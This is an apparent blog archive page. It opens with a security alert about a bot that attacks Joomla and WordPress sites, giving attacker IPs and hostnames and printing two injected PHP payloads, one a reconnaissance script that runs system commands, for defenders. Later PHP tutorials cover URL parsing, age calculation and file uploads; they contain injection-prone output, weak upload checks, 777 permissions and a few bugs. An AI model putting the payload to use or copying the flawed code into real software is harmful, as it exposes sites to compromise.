New threat for all Joomla and WordPress installations

3
866 days
by in Security

There is a new BOT out there, and one of the bad ones. I have started receiving traffic from it in my servers over the past week, and after some investigation it turns out it is quite a powerful bot, and so simple to use even a kid with a computer could use it.

The bot attacks mainly Joomla and WordPress installations, the Firestats plugin for WordPress version 1.6.2 has a known vulnerability that is exploited by this bot.

If successful, the bot will usually get your admin password and send it to a server somewhere, other versions f** your server up... it depends.

The bot is basically a top All-In-One product, that acts as a:

  • RFI Scanner
  • RFI Scan & Exploit
  • Joomla RFI Scan & Exploit
  • Milw0rm Search
  • Google bypass
  • Message Spy & Save
  • Auto Spreading

The last known spreader for the bot is the Fx29Spreadz v1.0 (Apr. 2009) which can be used from a server with a PHP Shell.

IPs and servers:

This bot has used the following IPs and hosts (That I know of)

  • 62.15.230.250
  • 210.68.188.206
  • 211.239.150.144
  • 125.251.133.3
  • 250.230.15.62.static.jazztel.es
  • buminch.org
  • www.framoss.ru

It has compromised servers in Republic of Korea, Taiwan and some other countries.

Injections:

The bot basically tries to insert the following PHP line:

 
< ?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
 

Although there is another variation which inserts:

 
    < ?php
    function ConvertBytes($number) {
    $len = strlen($number);
    if($len < 4) {
    return sprintf(”%d b”, $number); }
    if($len >= 4 && $len < =6) {
    return sprintf(”%0.2f Kb”, $number/1024); }
    if($len >= 7 && $len < =9) {
    return sprintf(”%0.2f Mb”, $number/1024/1024); }
    return sprintf(”%0.2f Gb”, $number/1024/1024/1024); }
 
    echo “Osirys<br>”;
    $un = @php_uname();
    $id1 = system(id);
    $pwd1 = @getcwd();
    $free1= diskfreespace($pwd1);
    $free = ConvertBytes(diskfreespace($pwd1));
    if (!$free) {$free = 0;}
    $all1= disk_total_space($pwd1);
    $all = ConvertBytes(disk_total_space($pwd1));
    if (!$all) {$all = 0;}
    $used = ConvertBytes($all1-$free1);
    $os = @PHP_OS;
 
    echo “0sirys was here and also is a fucking gay..”;
    echo “uname -a: $un”;
    echo “os: $os”;
    echo “id: $id1”;
    echo “free: $free”;
    echo “used: $used”;
    echo “total: $all”;
    exit;
 

Security recommendations:

If your website runs on WordPress, Joomla, Drupal, or other popular CMS you must upgrade all plugins and check for the latest version of the system!
If you have Firestats I recommend deactivating it for some time, until a new version fixing that bug is released, and still, I would wait.
If you have URL rewriting systems, ensure they are up-to-date, and if you built them re-check the security, and never include external files.

Hope this helped you :)

If you found any variations and new stuff about this please comment below

Parse links in user comments

0
877 days
by in PHP, Programming

When you allow users to comment and post stuff to your website, it is interesting and useful allowing them to post links and other stuff. But how can we do so easily?
Surely there is BBCode, phpBB, allowing only some HTML tags... etc but how easy is this approach for the end user? Of course some users will be familiar with BB code, or with HTML; others will be curious enough to learn how to use it, but most won't. And we want our users to be able to do so.

The solution: URL Parsing

How about this: They simply post the URL of whatever they want to include (A link, a picture, a YouTube video... ) and we detect that, and take the corresponding action.

First of all we need something that detects links, I have written a simple regexp to do so:

 
function parse($text){
		return preg_replace_callback('@(https?://([-\w\.]+)+(:\d+)?(/([\w/_\.-]*(\?\S+)?)?)?)@', 'parseUrl', $text);
	}
 

This is valid for almost all URLs, as long as http is the beggining. This function calls a callback function whenever a URL is found, called parseURL, which will then take care of the URL.

parseURL

Now that the URL is found, we need to take care of it: The url is stored in a parameter returned from the function preg_replace_callback. It is contained in the first element of the returned array.

 
function parseURL($url){
       $link = $url[0];
}
 

We will parse the full url with a built-in function called parse_url(), which will return the following data:

  • scheme - e.g. http
  • host
  • port
  • user
  • pass
  • path
  • query - after the question mark ?
  • fragment - after the hashmark #

To get the file format we will check the extension:

 
$ext = substr(strrchr($url['path']),'.'),1);
 

Image formats:

 
$imgs = array('jpg','jpeg','gif','png','tif'); // You can write more if you want, this is only an example
 

Now let's check if it is or not an image:

 
if(in_array($ext,$imgs)){
          return '<img src="'.$link.'" alt="This is a picture" class="insertedPic" />';
}
 

This way if a user inserts a link to a picture, the picture is displayed. You can now add a link, or change in any way the result of this.

If it is a YouTube video it would also be good to embed it, so we will first check if it is:

 
if(eregi('^(www\.)*(youtube\.).{2,3}$',$url['host'])){ // Check for youtube video
	return youtubeEmbed($url['query']);
}
 

As you can see, if the link comes from youtube, we will embed it using our custom function youtubeEmbed:
youtubeEmbed()

 
	function youtubeEmbed($params){
		parse_str($params);
		if(substr($v , strlen($v)-3 ,3) == '<br '){
			$v = substr($v , 0 ,strlen($v)-3);
		}
		if($v){
 
			return '
<div class="addedLink"/><object width="200px" height="150px" style="display:block; z-index:1"><param name="movie" value="http://www.youtube.com/v/'.$v.'"></param><param name="allowFullScreen" value="true"></param><param name="wmode" value="transparent"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/'.$v.'&rel=1&color1=0xFFFFFF&color2=0x666666&border=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="200" height="150" wmode="transparent"></embed></object><br ';
		}else{
			return false;
		}
	}
</pre/>
I won't go into too much detail here, it is quite simple, we take the parameter $v, which is the video ID, and then we proceed to the video embed...
 
You can do the same with Metacafe, Vimeo, College Humor, Google Video... etc and the process would be basically the same for all.
<h2>Further uses</h2>
 
I use this class to detect internal links in some of my websites. If the link points to a page with a picture for example, I show a small version of it, if it points to a user profile I show the user's name and some data... etc
 
The options are endless, and once you have everything parsed it is very easy to add new stuff. It really makes it simple for users to share pictures and videos, and it is the safest way of doing so, as well as the best way if you ever want to change the behavior, since in the database all you store is the raw URL.

Calculate age in PHP from timestamp

0
882 days
by in PHP, Programming

If you ever wanted to calculate someone's age in PHP from a birth timestamp, you must take into account that the age is more than the number of years, since days and months are also important, so I wrote a simple function that will return the exact age for a given timestamp:

 
function getAge($birth){
	$t = time();
	$age = ($birth < 0) ? ( $t + ($birth * -1) ) : $t - $birth;
	return floor($age/31536000);
}
 

Basically we first get the current time and store it in a variable (To avoid having to call the function time more than once)
Then we get the age in milliseconds (Taking into account that before 1969 timestamps are negative, thus the ternary operator)

Now we have the date in milliseconds, we divide it by the number of milliseconds in a year (60*60*24*365)

And that is basically it :)

Easiest PHP file upload

1
914 days
by in PHP, Programming

Hello people,
I want to share with all of you a file upload class I have developed, that makes it stupid simple to upload files haha

The PHP class:

First of all, here is the PHP class you will need:

 
< ?php
//Uploader class, by Alex
// This class is meant to handle all kinds of file uploads for DJs Music
// Images, music... all here
 
class Uploader{
	var $maxSize;
	var $allowedExt;
	var $fileInfo = array();
 
	function config($maxSize,$allowedExt){
		$this->maxSize = $maxSize;
		$this->allowedExt = $allowedExt;
	}
 
function generateRandStr($length){
      $randstr = "";
      for($i=0; $i< $length; $i++){
         $randnum = mt_rand(0,61);
         if($randnum < 10){
            $randstr .= chr($randnum+48);
         }else if($randnum < 36){
            $randstr .= chr($randnum+55);
         }else{
            $randstr .= chr($randnum+61);
         }
      }
      return $randstr;
   }
 
	function check($uploadName){
		if(isset($_FILES[$uploadName])){
			$this->fileInfo['ext'] = substr(strrchr($_FILES[$uploadName]["name"], '.'), 1);
			$this->fileInfo['name'] = basename($_FILES[$uploadName]["name"]);
			$this->fileInfo['size'] = $_FILES[$uploadName]["size"];
			$this->fileInfo['temp'] = $_FILES[$uploadName]["tmp_name"];
			if($this->fileInfo['size']< $this->maxSize){
				if(strlen($this->allowedExt)>0){
					$exts = explode(',',$this->allowedExt);
					if(in_array($this->fileInfo['ext'],$exts)){
						return true;
					}
					echo 'Invalid file extension. Allowed extensions are '.$this->allowedExt;
					return false; //failed ext
				}
				echo 'Sorry but there is an error in our server. Please try again later.';
				return false; //All ext allowed
			}else{
				if($this->maxSize < 1000000){
					$rsi = round($this->maxSize/1000,2).' Kb';
				}else if($this->maxSize < 1000000000){
					$rsi = round($this->maxSize/1000000,2).' Mb';
				}else{
					$rsi = round($this->maxSize/1000000000,2).' Gb';
				}
				echo 'File is too big. Maximum allowed size is '.$rsi;
				return false; //failed size
			}
		}
		echo 'Oops! An unexpected error occurred, please try again later.';
		return false; //Either form not submitted or file/s not found
	}
 
	function upload($name,$dir,$fname=false){
		if(!is_dir($dir)){
			echo 'Sorry but there is an error in our server. Please try again later.';
			return false; //Directory doesn't exist!
		}
		if($this->check($name)){
			//Process upload. All info stored in array fileinfo:
			//Dir OK, keep going:
			//Get a new filename:
			if(!$fname){
				$this->fileInfo['fname'] = $this->generateRandStr(15).'.'.$this->fileInfo['ext'];
			}else{
				$this->fileInfo['fname'] = $fname;
			}
			while(file_exists($dir.$this->fileInfo['fname'])){
				$this->fileInfo['fname'] = $this->generateRandStr(15).'.'.$this->fileInfo['ext'];
			}
			//Unique name gotten
			// Move file:
			if(@move_uploaded_file($this->fileInfo['temp'], $dir.$this->fileInfo['fname'])){
				//Done
				return true;
			}else{
				echo 'The file could not be uploaded, although everything went ok :S ... Please try again later.';
				return false; //File not moved
			}
		}else{
			return false;
		}
	}
 
};
//Initialize the object:
$up = new Uploader;
?>
 

Alright this is the code. You shouldn't have to modify it, simply include it where you process the upload and the class will initiate itself inside the variable $up

Usage:

For this example I will suppose you have a basic HTML form as follows:

 
<form action="process.php" method="post" enctype="multipart/form-data">
<input name="uploadPic" type="file" />
<input name="upload" type="submit" value="Upload" />
</form>
 

As you can see, the action is process.php, which is, in this example, where the picture upload will be processed.

In the file process.php we will first include the upload handler, then configure it, and finally try to upload the file into the directory pictures/. Please take into account that it must be writable (CHMOD 777)

process.php:

 
< ?php
//include the class:
include('handleUpload.php');
$up->config('2000000','jpg,gif,png');
if($up->upload('uploadPic','pictures/')){
	echo 'File uploaded. File information: ';
	echo $up->fileInfo['ext'].'';
	echo $up->fileInfo['name'].'';
	echo $up->fileInfo['size'];
}
// If the file was not uploaded, the error will have been echoed automatically
?>
 

As you can see there is no }else{ because the handler echoes the errors by itself. You can change this behavior easily by setting up your own function as desired.

In this example we have configured it to allow a maximum of 2000000 bytes per upload, and only jpg, gif, and png pictures.

Now that the file is uploaded you have some information about it in the $up object. The format ($up->fileInfo['ext']), the name ($up->fileInfo['name']), and finally the size in bytes ($up->fileInfo['size']).

The handler also generates a random name, and ensures it is not already in the directory. The new name is stored in the fileInfo array as mentioned above.

I hope you found this useful :)

PC Application Errors and How To Deal With Them

0
920 days
by in OS, Windows

Your Windows operating system comes packaged with some useful applications such as a word processor, a spreadsheet, a calculator and so on. However, with the passage of time, you end up installing several other applications to meet your specific requirements. If you have a branded PC, there are a number of other applications which come pre-installed, besides your Windows operating system.

Almost all applications on your PC add and use DLL files or Dynamic Link Library Files to perform specific tasks. These DLL files were originally created by Microsoft to improve the efficiency of Windows operating system. Later, a number of other applications started using the same DLL files. Furthermore, many application manufacturers began developing their own DLL files.

Causes of DLL Application Errors

Whether they are core operating system DLL files or DLLs belonging to a certain application, most of the DLL files are stored in the Windows directory. This enables easy access to all applications installed on your computer. With so many DLL files being used simultaneously by a number of applications, it’s quite natural for you to encounter application related DLL errors at one time or other.

A malware infection, a corrupt hard drive, a damaged Windows registry, an accidental deletion of a critical DLL file or overwriting a newer DLL version with an older one are some of the reasons which may generate DLL error messages.

For example, “clb.dll application has failed to start error" and “xprt5.dll application error” may occur if the given DLL file is either corrupt or missing. Here, Clb.dll is one of the Windows operating system’s core files. The xprt5.dll is a part of the XPRT Runtime Library program. This file usually gets installed with AOL instant messenger.

How to Deal With DLL Application Errors

Dealing with DLL errors is not very tough, as long as you take a systematic approach to fix the error. Here are general steps that you may follow to fix these errors:

  1. If the file gets deleted by mistake, check the Recycle Bin to see if it is there. In case you find the missing DLL file, restore it to resolve the error. You may also use a file recovery software to do the task. Avoid downloading the missing DLL from an online DLL web site. Many such DLLs are known to be malware in disguise. You may end up causing more harm to your PC by using these downloaded DLL files.
  2. If a system DLL file is missing, replace it by extracting the original file from the Windows setup CD.
  3. Install the latest version of the software to which the DLL file belongs.
  4. Update your Windows operating system. You can do this by using the Windows Update tool that comes with Windows.
  5. Scan and clean your PC from any infections from virus, worms, Trojans, or spyware. Use reliable and efficient antivirus and antispyware tools for this task.
  6. Scan your registry for invalid and incorrect DLL entries. Registry problems are known to be one of the common causes of several DLL errors. An easy and efficient method to fix registry DLL errors is by using a compatible and genuine registry repair tool.
« Previous
Next »
Go to Top